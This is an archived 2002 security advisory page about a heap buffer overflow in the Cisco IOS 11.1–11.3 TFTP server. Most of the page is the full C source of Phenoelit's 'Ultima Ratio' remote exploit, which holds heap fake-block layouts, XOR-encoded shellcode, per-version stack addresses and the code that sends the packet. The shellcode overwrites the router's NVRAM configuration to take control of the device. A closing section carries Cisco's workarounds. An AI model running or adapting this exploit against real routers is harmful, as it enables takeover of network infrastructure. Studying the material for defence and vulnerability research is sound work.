Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Cisco :: napl5571.htm

Cisco tftp remote overflow



29th Jul 2002 [SBWID-5571]
COMMAND

	Cisco tftp remote overflow

SYSTEMS AFFECTED

	IOS 11.1 - 11.3

PROBLEM

	In   FX   [fx@phenoelit.de],    FtR    [ftr@phenoelit.de]    and    kim0
	[kim0@phenoelit.de]   of   Phenoelit   Group   [http://www.phenoelit.de]
	advisroy [http://www.phenoelit.de/stuff/Cisco_tftp.txt] :
	

	The Cisco IOS integrated TFTP server  suffers  from  a  buffer  overflow
	condition.  When  requesting  a  file  name   with   approximately   700
	characters, the device crashes and may reboot.  This  only  happens,  if
	the served file is on a flash device and no alias is assigned to it.
	

	Vulnerable:
	

		router# conf t

		router# tftp-server flash:ios_11.3_a-b-c-d.bin

		

	Not vulnerable:
	

		router# conf t

		router# tftp-server flash:ios_11.3_a-b-c-d.bin alias TheStuff

	

	[ Example ]
	

		OpenBSD# tftp ciscoxx.xxx.xxxx.xxx

		tftp> get AAAAAAAAA....(700 times)

	

	

	

	 Editor's note

	 =============

	

	How long before a cisco remote shell for the IOS  ?  Strange  rumors  of
	code floating around ... UPDATE (20  August  2002),  BTW  phenoelit  did
	release the code :-), enjoy :
	

	Read the details on the magic here :
	

	http://www.phenoelit.de/stuff/defconX.pdf

	http://www.phenoelit.de/stuff/BHLV.pdf

	

	

	

	/*

	                         --== P H E N O E L I T ==--

	               ____  _______                      _____       _______

	     ____   ____  / /__  __/  __   ___ ______    /    /______/__  __/   ______

	    /   /  /   / /    / / -*-/  \_/  //     /   /    /      /  / / -*- / __  /

	   /   /  /   / /    / / __ / /\_// // __  /   / /\ \  __  /  / / __  / / / /

	  /   /__/   / /____/ / / // /   / // / / /   / / / / / / /  / / / / / /_/ /

	 /__________/______/_/ /_//_/   /_//_/ /_/   /_/ /_/_/ /_/  /_/ /_/ /_____/

	

	*/

	

	/* Cisco IOS Heap exploit prove of concept "Ultima Ratio".

	 * by FX of Phenoelit <fx@phenoelit.de>

	 * http://www.phenoelit.de

	 *

	 * Black Hat Briefings 2002 / Las Vegas

	 * DefCon X 2002 / Las Vegas

	 * 

	 * Cisco IOS 11.1.x to 11.3.x TFTP-Server

	 * If a TFTP server for a flash file is configured, a long filename in the TFTP 

	 * request will overflow a heap buffer. The attached program is a PoC to exploit 

	 * this vulnerability by executing "shell code" on the router and write the 

	 * attached configuration into NVRAM to basically own the router. 

	 *

	 * Command line argument -p XXXXXXXX most definetly required. Obtain from syslog 

	 * host or any other means possible. The stack address changes by image. 

	 * Find the right one for the IOS build you are running and if you feel like it, 

	 * send it to me.

	 *

	 * Kiddy Warnings: 

	 * - It will NOT work in fire-and-forget mode. 

	 * - The shellcode is only good for Cisco 1000 and 1600 series.

	 * - This code is not for illegal use. 

	 *

	 * $Id: UltimaRatioVegas.c,v 1.1 2002/07/26 16:39:38 $

	 */

	#include <stdio.h>

	#include <stdlib.h>

	#include <unistd.h>

	#include <string.h>

	#include <netinet/in.h>

	#include <rpc/types.h>

	#include <netdb.h>

	#include <sys/socket.h>

	#include <arpa/inet.h>

	#include <errno.h>

	

	#include <sys/ioctl.h>

	#include <netinet/in.h>                

	#include <netpacket/packet.h>

	#include <net/ethernet.h>               

	#include <net/if.h>

	#include <sys/stat.h>

	#include <sys/types.h>

	#include <fcntl.h>

	

	

	typedef struct {

	    u_int16_t	opcode			__attribute__((packed));

	    u_int8_t	file			__attribute__((packed));

	    u_int8_t	type			__attribute__((packed));

	} tftp_t;

	

	typedef struct {

	    u_int16_t   magic                   __attribute__((packed));

	    u_int16_t   one                     __attribute__((packed));

	    u_int16_t   checksum                __attribute__((packed));

	    u_int16_t   IOSver                  __attribute__((packed));

	    u_int32_t   unknown                 __attribute__((packed));

	    u_int32_t   ptr                     __attribute__((packed));

	    u_int32_t   size                    __attribute__((packed));

	} nvheader_t;

	

	struct {

	    int			verbose;

	    int			test;

	    char		*filename;

	    unsigned int	overflow;

	    u_int32_t		prev;

	    u_int32_t		next;

	    u_int32_t		offset;

	    u_int32_t		buffer_location;

	    u_int32_t		stack_address;

	    unsigned int	nop_sleet;

	    int			dot1;

	} cfg;

	

	u_int16_t	chksum(u_char *data, unsigned long count);

	void		hexdump(unsigned char *bp, unsigned int length);

	void		usage(char *s);

	

	#define MAX_SIZE	1472

	#define XOR_PAT		0xD5

	

	#define FB_PREV		28

	#define FB_NEXT		24

	#define FB_FREENEXT	60

	#define FB_FREEPREV	64

	

	#define SPLASH		\

		"Phenoelit ULTIMA RATIO\n" \

		" Cisco IOS TFTP-Server remote exploit (11.1.-11.3)\n" \

		" (C) 2002 - FX of Phenoelit <fx@phenoelit.de>\n" 

	

	int main(int argc, char **argv) {

	    char		option;

	    extern char		*optarg;

	    unsigned int	i;

	

	    /* confg file */

	    int                 fd;

	    struct stat         sb;

	

	    u_char              *buffer;

	    u_char              *p;

	    nvheader_t          *nvh;

	    unsigned int        len;

	    u_int16_t           cs1;

	    u_int32_t		temp;

	

	    /* Network */

	    int			sfd;

	    struct in_addr	dest;

	    struct sockaddr_in  sin;

	

	    /* the packet */

	    unsigned int	psize = 0;

	    u_char		*pack;

	    tftp_t		*tftp;

	    char		tftp_type[] =	"PHENOELIT";

	    char		terminator[] =	"\xCA\xFE\xF0\x0D";

	

	

	    char		fakeblock[] =

		"\xFD\x01\x10\xDF"	// RED

		"\xAB\x12\x34\xCD"	// MAGIC

		"\xFF\xFF\xFF\xFF"	// PID

		"\x80\x81\x82\x83"	// 

		"\x08\x0C\xBB\x76"	// NAME

		"\x80\x8a\x8b\x8c"	// 

	

		"\x02\x0F\x2A\x04"	// NEXT 

		"\x02\x0F\x16\x94"	// PREV 

	

		"\x7F\xFF\xFF\xFF"	// SIZE 

		"\x01\x01\x01\x01"	// 

		"\xA0\xA0\xA0\xA0"	// padding ?

		"\xDE\xAD\xBE\xEF"	// MAGIC2

		"\x8A\x8B\x8C\x8D"	// 

		"\xFF\xFF\xFF\xFF"	// padding 

		"\xFF\xFF\xFF\xFF"	// padding 

	

		"\x02\x0F\x2A\x24"	// FREE NEXT (BUFFER)

		"\x02\x05\x7E\xCC"	// FREE PREV (STACK of Load Meter, return address)

	

		;

	

	    char		fakeblock_dot1[] =

		"\xFD\x01\x10\xDF"	// RED

		"\xAB\x12\x34\xCD"	// MAGIC

		"\xFF\xFF\xFF\xFF"	// PID

		"\x80\x81\x82\x83"	// 

		"\x08\x0C\xBB\x76"	// NAME

		"\x80\x8a\x8b\x8c"	// 

	

		"\x02\x0F\x2A\x04"	// NEXT 

		"\x02\x0F\x16\x94"	// PREV 

	

		"\x7F\xFF\xFF\xFF"	// SIZE 

		"\x01\x01\x01\x01"	// 

		//"\xA0\xA0\xA0\xA0"	// no padding here on 11.1

		"\xDE\xAD\xBE\xEF"	// MAGIC2

		"\x8A\x8B\x8C\x8D"	// 

		"\xFF\xFF\xFF\xFF"	// padding 

		"\xFF\xFF\xFF\xFF"	// padding 

	

		"\x02\x0F\x2A\x24"	// FREE NEXT (BUFFER)

		"\x02\x05\x7E\xCC"	// FREE PREV (STACK of Load Meter, return address)

	

		;

	

	    char 		nop[] =

		"\x4E\x71";			// the IOS will write here

	

	    char		shell_code[] =

		

		// ************** CODE ****************

		

	        "\x22\x7c\x0f\xf0\x10\xc2"      //moveal #267391170,%a1 (0x020F2A24)

	        "\xe2\xd1"                      //lsrw %a1@ (0x020F2A2A)

	        "\x47\xfa\x01\x23"              //lea %pc@(12d<xor_code+0xfd>),%a3 (0x020F2A2C)

	        "\x96\xfc\x01\x01"              //subaw #257,%a3 (0x020F2A30)

	        "\xe2\xd3"                      //lsrw %a3@ (0x020F2A34)

	        "\x22\x3c\x01\x01\x01\x01"      //movel #16843009,%d1 (0x020F2A36)

	        "\x45\xfa\x01\x17"              //lea %pc@(131<xor_code+0x101>),%a2(0x020F2A3C)

	        "\x94\xfc\x01\x01"              //subaw #257,%a2 (0x020F2A40)

	        "\x34\x3c\xd5\xd5"              //movew #-10795,%d2 (0x020F2A44)

	        "\xb5\x5a"                      //eorw %d2,%a2@+ (0x020F2A48)

	        "\x0c\x92\xca\xfe\xf0\x0d"      //cmpil #-889262067,%a2@ (0x020F2A4A)

	        "\xcc\x01"                      //branch (modified) (0x020F2A50)

	        "\xff\xf6"                      //(0x020F2A52)

	

		// ************** XORed CODE ****************

	

	        "\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2A5E)

	        "\xF7\xA9\xDA\x25\xC5\x17"      //moveal #267391170,%a1 (0x020F2A62)

	        "\xE7\x69\xD5\xD4"              //movew #1,%a1@ (0x020F2A68)

	        "\x90\x2F\xD5\x87"              //lea %pc@(62 <config>),%a2 (0x020F2A6C)

	        "\xF7\xA9\xDB\xD5\xD7\x7B"      //moveal #234881710,%a1 (0x020F2A70)

	        "\xA1\xD4"                      //moveq #1,%d2 (0x020F2A76)

	        "\xC7\x0F"                      //moveb %a2@+,%a1@+ (0x020F2A78)

	        "\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A7A)

	        "\x46\x97"                      //subxw %d2,%d1 (0x020F2A80)

	        "\xBE\xD5\x2A\x29"              //bmiw 22 <write_delay> (0x020F2A82)

	        "\xD9\x47\x1F\x2B\x25\xD8"      //cmpil #-889262067,%a2@ (0x020F2A86)

	        "\xB3\xD5\x2A\x3F"              //bnew 1a <copy_confg> (0x020F2A8C)

	        "\xE7\x29\xD5\xD5"              //movew #0,%a1@+ (0x020F2A90)

	        "\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A94)

	        "\x46\x97"                      //subxw %d2,%d1 (0x020F2A9A)

	        "\xBE\xD5\x2A\x29"              //bmiw 3c <write_delay2> (0x020F2A9C)

	        "\x66\x29\xDB\xD5\xF5\xD5"      //cmpal #234889216,%a1 (0x020F2AA0)

	        "\xB8\xD5\x2A\x3D"              //bltw 32 <delete_confg> (0x020F2AA6)

	        "\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2AAA)

	        "\xF5\xA9\xDA\x25\xD5\xD5"      //moveal #267386880,%a0 (0x020F2AAE)

	        "\xFB\x85"                      //moveal %a0@,%sp (0x020F2AB4)

	        "\xF5\xA9\xDA\x25\xD5\xD1"      //moveal #267386884,%a0 (0x020F2AB6)

	        "\xF5\x85"                      //moveal %a0@,%a0 (0x020F2ABC)

	        "\x9B\x05"                      //jmp %a0@ (0x020F2ABE)

	

		;

	

	    /* configure defaults */

	    memset(&dest,0,sizeof(dest));

	    memset(&cfg,0,sizeof(cfg));

	    cfg.overflow=652;

	    cfg.prev=0x020F1694;

	    cfg.next=0x020F2A04;

	    //cfg.offset=0x13D4;

	    //cfg.offset=0x137C;	// 4988 

	    cfg.offset=0x1390;		// 5008 

	    cfg.buffer_location=0x020F2A24;

	    cfg.stack_address=0x02057ECC;

	    cfg.nop_sleet=16;

	

	    printf("%s\n",SPLASH);

	

	    while ((option=getopt(argc,argv,"1vtd:f:l:p:o:s:n:N:"))!=EOF) {

		switch (option) {

		    case 'd':	if (inet_aton(optarg,&dest)==0) {

				    /* ups, wasn't an IP - maybe a hostname */

				    struct hostent      *hd;

				    if ((hd=gethostbyname(optarg))==NULL) {

					fprintf(stderr,"Could not resolve destination host\n");

					return (1);

				    } else {

					bcopy(hd->h_addr,(char *)&dest,hd->h_length);

				    }

				}

				break;

	            case 'f':   cfg.filename=(char *)malloc(strlen(optarg)+1);

	                        strcpy(cfg.filename,optarg);

	                        break;

		    case 'l':	if ( (cfg.overflow=atoi(optarg))==0 ) {

				    fprintf(stderr,"Overflow length incorrect\n");

				    return (1);

				}

				break;

		    case 'o':	if ( (cfg.offset=atoi(optarg))==0 ) {

				    fprintf(stderr,"Offset incorrect\n");

				    return (1);

				}

				break;

		    case 'N':	if ( (cfg.nop_sleet=atoi(optarg))==0 ) {

				    fprintf(stderr,"NOP sleet incorrect\n");

				    return (1);

				}

				break;

		    case 'p':	sscanf(optarg,"%08X",&(cfg.prev));

				break;

		    case 'n':	sscanf(optarg,"%08X",&(cfg.next));

				break;

		    case 's':	sscanf(optarg,"%08X",&(cfg.stack_address));

				break;

		    case 'v':	cfg.verbose++;

				break;

		    case 't':	cfg.test++;

				break;

		    case '1':	cfg.dot1++;

				break;

		    default:	usage(argv[0]);

				return (1);

		}

	    }

	

	    /*

	     * check for dummies 

	     */

	

	    if ( (!(*((u_int32_t *)&dest))) || (cfg.filename==NULL) ) {

		usage(argv[0]);

		return 1;

	    }

	

	    /* 

	     * patch fake block with new addresses 

	     */

	

	    cfg.buffer_location=cfg.prev+20+cfg.offset;

	

	    if (cfg.dot1) {

		temp=htonl(cfg.prev+20);

		memcpy(&(fakeblock_dot1[FB_PREV]),&(temp),4);

		temp=htonl(cfg.next);

		memcpy(&(fakeblock_dot1[FB_NEXT]),&(temp),4);

		temp=htonl(cfg.buffer_location);

		memcpy(&(fakeblock_dot1[FB_FREENEXT-4]),&(temp),4);

		temp=htonl(cfg.stack_address);

		memcpy(&(fakeblock_dot1[FB_FREEPREV-4]),&(temp),4);

	    } else {

		temp=htonl(cfg.prev+20);

		memcpy(&(fakeblock[FB_PREV]),&(temp),4);

		temp=htonl(cfg.next);

		memcpy(&(fakeblock[FB_NEXT]),&(temp),4);

		temp=htonl(cfg.buffer_location);

		memcpy(&(fakeblock[FB_FREENEXT]),&(temp),4);

		temp=htonl(cfg.stack_address);

		memcpy(&(fakeblock[FB_FREEPREV]),&(temp),4);

	    }

	

	    if (cfg.verbose) {

		if (cfg.dot1) printf("using IOS 11.1 Heap management mode\n");

		printf("Values:\n"

			"- prev ptr of 0x%08X\n"

			"- next ptr of 0x%08X\n"

			"- buffer located at 0x%08X (offset %u)\n"

			"- stack return address 0x%08X\n"

			"- overflow lenght %u\n"

			"- NOP sleet %u\n"

			,

			cfg.prev+20,

			cfg.next,

			cfg.buffer_location,cfg.offset,

			cfg.stack_address,

			cfg.overflow,

			cfg.nop_sleet);

	    }

	

	    if (cfg.dot1) {

		if (strlen(fakeblock_dot1)+1!=sizeof(fakeblock_dot1)) {

		    fprintf(stderr,"0x00 byte in fake block detected!\n");

		    if (cfg.verbose) hexdump(fakeblock,sizeof(fakeblock_dot1)-1);

		    return (1);

		}

	    } else {

		if (strlen(fakeblock)+1!=sizeof(fakeblock)) {

		    fprintf(stderr,"0x00 byte in fake block detected!\n");

		    if (cfg.verbose) hexdump(fakeblock,sizeof(fakeblock)-1);

		    return (1);

		}

	    }

	

	    /* 

	     * Load Config

	     * - load into buffer

	     * - prepare NVRAM header

	     * - calculate checksum

	     * -> *buffer contains payload

	     */

	    if (cfg.filename==NULL) return (-1);

	    if (stat(cfg.filename,&sb)!=0) {

	        fprintf(stderr,"Could not stat() file %s\n",cfg.filename);

	        return (-1);

	    }

	

	    if ((fd=open(cfg.filename,O_RDONLY))<0) {

	        fprintf(stderr,"Could not open() file %s\n",cfg.filename);

	        return (-1);

	    }

	

	    len=sb.st_size;

	    if ((buffer=(char *)malloc(len+sizeof(nvheader_t)+10))==NULL) {

	        fprintf(stderr,"Malloc() failed\n");

	        return (-1);

	    }

	    memset(buffer,0,len+sizeof(nvheader_t)+10);

	

	    p=buffer+sizeof(nvheader_t);

	    if (cfg.verbose) printf("%d bytes config read\n",read(fd,p,len));

	    close(fd);

	

	    /* 

	     * pad config so it is word bound for the 0xcafef00d test

	     */

	    if ((len%2)!=0) {

		strcat(p,"\x0A");

		len++;

		if (cfg.verbose) printf("Padding config by one\n");

	    }

	

	    nvh=(nvheader_t *)buffer;

	    nvh->magic=htons(0xABCD);		

	    nvh->one=htons(0x0001);		// is always one 

	    nvh->IOSver=htons(0x0B03);		// IOS version

	    nvh->unknown=htonl(0x00000014);	// something, 0x14 just works

	    nvh->ptr=htonl(0x020AA660);		// something, 0x020AA660 just works

	    nvh->size=htonl(len);

	

	    cs1=chksum(buffer,len+sizeof(nvheader_t)+2);

	    if (cfg.verbose) printf("Checksum: %04X\n",htons(cs1));

	    nvh->checksum=cs1;

	

	

	    /* 

	     * Check the size of all together and make sure it will fit into the

	     * packet

	     */

	    psize=  len + sizeof(nvheader_t) + 

		    + strlen(fakeblock)

		    + ( strlen(nop) * cfg.nop_sleet )

		    + strlen(shell_code)

		    + strlen(terminator)

		    + cfg.overflow + 1

		    + sizeof(tftp_t) + strlen(tftp_type) ;

	    if ( psize > MAX_SIZE ) {

		fprintf(stderr,"The config file specified is too big and does not fit"

			" into one packet. Specify smaller file\n");

		free(buffer);

		return (1);

	    }

	    if ((pack=malloc(psize))==NULL) {

		fprintf(stderr,"Could not malloc() packet\n");

		return (-1);

	    }

	    memset(pack,0,psize);

	

	

	    /* 

	     * XOR encode the config block 

	     */ 

	    p=buffer;

	    for (i=0;i<(len+sizeof(nvheader_t));i++) {

		p[i]=p[i]^XOR_PAT;

	    }

	

	

	    /* 

	     * Prepare the TFTP protocol part

	     */

	    tftp=(tftp_t *)((void *)pack);

	    tftp->opcode=htons(1);

	    

	    /* (1) Overflow */

	    p=(char *)&(tftp->file);

	    memset(p,'A',cfg.overflow);

	    p+=cfg.overflow;

	

	    /* (2) Fake block */

	    if (cfg.dot1) {

		memcpy(p,fakeblock_dot1,sizeof(fakeblock_dot1)-1);

		p+=sizeof(fakeblock_dot1)-1;

	    } else {

		memcpy(p,fakeblock,sizeof(fakeblock)-1);

		p+=sizeof(fakeblock)-1;

	    }

	

	    /* (3) add NOP sleet */

	    for (i=0;i<cfg.nop_sleet;i++) {

		memcpy(p,nop,sizeof(nop)-1);

		p+=sizeof(nop)-1;

	    }

	

	    /* (4) append shell code */

	    memcpy(p,shell_code,sizeof(shell_code)-1);

	    p+=sizeof(shell_code)-1;

	

	    /* (5) new config */

	    memcpy(p,buffer,strlen(buffer));

	    p+=strlen(buffer);

	

	    /* (6) terminator */

	    strcpy(p,terminator);

	    p+=strlen(terminator)+1;

	

	    /* (7) give it a type */

	    strcpy(p,tftp_type);

	

	

	

	    if (cfg.verbose>1) hexdump(pack,psize);

	

	    if (cfg.test) return(0);

	

	    /*

	     * Perform attack

	     */

	    if ((sfd=socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP))<0) {

		perror("socket()");

		return (-1);

	    }

	    memset(&sin,0,sizeof(struct sockaddr_in));

	    sin.sin_family=AF_INET;

	    sin.sin_port=htons(69);  /* tftp */

	    memcpy(&(sin.sin_addr),&dest,sizeof(sin.sin_addr));

	

	    printf("*** Sending exploit ***\n");

	

	    if (sendto(sfd,pack,psize,0,

			(struct sockaddr *)&sin,sizeof(struct sockaddr_in))<=0) {

		perror("sendto()");

		return(-1);

	    }

	

	    close(sfd);

	

	    if (cfg.verbose) printf("\t%d bytes network data sent\n",psize);

	

	    /*

	     * clean up 

	     */

	    free(buffer);

	    free(pack);

	

	    return 0;

	}

	

	

	/* checksum function as used in IRPAS, stolen somewhere */

	u_int16_t chksum(u_char *data, unsigned long count) {

	    u_int32_t           sum = 0;

	    u_int16_t           *wrd;

	

	    wrd=(u_int16_t *)data;

	    while( count > 1 )  {

	        sum = sum + *wrd;

	        wrd++;

	        count -= 2;

	    }

	

	    if( count > 0 ) { sum = sum + ((*wrd &0xFF)<<8); }

	

	    while (sum>>16) {

	        sum = (sum & 0xffff) + (sum >> 16);

	    }

	

	    return (~sum);

	}

	

	

	/* A better version of hdump, from Lamont Granquist.  Modified slightly

	 * by Fyodor (fyodor@DHP.com) 

	 * obviously stolen by FX from nmap (util.c)*/

	void hexdump(unsigned char *bp, unsigned int length) {

	

	  /* stolen from tcpdump, then kludged extensively */

	

	  static const char asciify[] = "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";

	

	  register const u_short *sp;

	  register const u_char *ap;

	  register u_int i, j;

	  register int nshorts, nshorts2;

	  register int padding;

	

	  printf("\n\t");

	  padding = 0;

	  sp = (u_short *)bp;

	  ap = (u_char *)bp;

	  nshorts = (u_int) length / sizeof(u_short);

	  nshorts2 = (u_int) length / sizeof(u_short);

	  i = 0;

	  j = 0;

	  while(1) {

	    while (--nshorts >= 0) {

	      printf(" %04x", ntohs(*sp));

	      sp++;

	      if ((++i % 8) == 0)

	        break;

	    }

	    if (nshorts < 0) {

	      if ((length & 1) && (((i-1) % 8) != 0)) {

	        printf(" %02x  ", *(u_char *)sp);

	        padding++;

	      }

	      nshorts = (8 - (nshorts2 - nshorts));

	      while(--nshorts >= 0) {

	        printf("     ");

	      }

	      if (!padding) printf("     ");

	    }

	    printf("  ");

	

	    while (--nshorts2 >= 0) {

	      printf("%c%c", asciify[*ap], asciify[*(ap+1)]);

	      ap += 2;

	      if ((++j % 8) == 0) {

	        printf("\n\t");

	        break;

	      }

	    }

	    if (nshorts2 < 0) {

	      if ((length & 1) && (((j-1) % 8) != 0)) {

	        printf("%c", asciify[*ap]);

	      }

	      break;

	    }

	  }

	  if ((length & 1) && (((i-1) % 8) == 0)) {

	    printf(" %02x", *(u_char *)sp);

	    printf("                                       %c", asciify[*ap]);

	  }

	  printf("\n");

	}

	

	void usage(char *s) {

	    fprintf(stderr,

		    "Usage: %s -d <device_ip> -f config.file [-opts]\n"

		    "Options:\n"

		    " -p 1234ABCD   sets the previous ptr address\n"

		    " -n 1234ABCD   sets the next ptr address\n"

		    " -s 1234ABCD   sets the stack address\n"

		    " -o 1234       sets the offset from prev to buffer\n"

		    " -l 1234       sets the overflow size\n"

		    " -N 1234       sets the NOP sleet\n"

		    " -1            use IOS 11.1 memory layout\n"

		    " -v            increases verbosity (highly recommended)\n"

		    " -t            only test, don't send\n"

		    "\n"

		    "Recommended stack addresses:\n"

		    "IOS 11.1(20)         -s 020A1120 (IP Input)\n"

		    "IOS 11.2(18)P        -s 0204120C (Load Meter)\n"

		    "IOS 11.2(26)P4       -s 02041554 (Load Meter)\n"

		    "IOS 11.3(11)B        -s 02057ECC (Load Meter)\n"

		    ,s);

	}

	

SOLUTION

	In Cisco Security Advisory:
	

	 Software Versions and Fixes

	 ===========================

	

	The affected releases, 11.1, 11.2, and 11.3, are all  at  End  of  Life,
	which means they do not have a maintenance version scheduled,  and  will
	not be fixed. It is recommended to use  the  documented  workarounds  if
	these versions must be used.
	

	 Workarounds

	 ===========

	

	There are two workarounds known to address this issue.
	

	

	Disable the TFTP server entirely

	

	

	Cisco IOS provides TFTP server functionality to facilitate the  transfer
	of Cisco IOS images when another TFTP server may not  be  available.  If
	the TFTP server functionality is not  currently  needed,  the  following
	steps may be taken to disable the TFTP server.
	

	 1. While in enable mode on the router, issue the command "show running-config"

	    and look for lines starting with "tftp-server".

	   

	 2. For each line in the config starting with "tftp-server", prepend the 

	    word "no" followed by a space followed by the full text of the matching 

	    line in config mode to remove that entry. This step must be repeated 

	    for each matching line of the config.

	   

	 3. Once this task has been completed, verify that there are no lines starting

	    with "tftp-server" by issuing the command "show running-config" from 

	    the enable prompt.

	   

	 4. Once verified, save the new configuration so that the server will be

	    disabled upon the next reset of the device.

	

	

	

	Provide aliases for TFTP server filenames

	

	

	Cisco IOS provides the ability to alias a long  filename  to  a  shorter
	filename. If the tftp-server  entries  in  the  configuration  have  the
	keyword  "alias"  in  them,  the  router  will  not  be  vulnerable   to
	exploitation  of  this  vulnerability.  To  implement  this  workaround,
	follow the directions above for disabling the TFTP server, and then  add
	any configuration lines back to the  config  by  appending  the  keyword
	"alias" followed by a short filename such that the command resembles:
	

	    tftp-server flash rsp-jv-mz.111-24a alias CiscoIOS 

	

	Note that this must be done for every line starting  with  "tftp-server"
	in  the  configuration.  The  existence  of  a  single   line   in   the
	configuration beginning with  "tftp-server"  without  an  alias  defined
	while running affected versions of software is all  that  is  needed  to
	become subject to this vulnerability.
	

	

	

	 Obtaining Fixed Software

	 ========================

	

	As the affected versions are not scheduled to be  fixed,  and  a  simple
	workaround is available, a software upgrade is not required  to  address
	this vulnerability. However, if you have a service  contract,  and  wish
	to upgrade to unaffected code, you may obtain upgraded software  through
	your regular update  channels.  For  most  customers,  this  means  that
	upgrades should be obtained  through  the  Software  Center  on  Cisco's
	Worldwide Web site at http://www.cisco.com.
	

	If you need assistance with the implementation of  the  workarounds,  or
	have questions on the workarounds, please contact  the  Cisco  Technical
	Assistance Center (TAC).
	

	Cisco TAC contacts are as follows:
	

	  * +1 800 553 2447 (toll free from within North America)

	  * +1 408 526 7209 (toll call from anywhere in the world)

	  * e-mail: tac@cisco.com

	

	See   http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml    for
	additional  TAC  contact  information,   including   special   localized
	telephone numbers and instructions  and  e-mail  addresses  for  use  in
	various languages.
	

	Please    do     not     contact     either     "psirt@cisco.com"     or
	"security-alert@cisco.com" for software upgrades.
	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH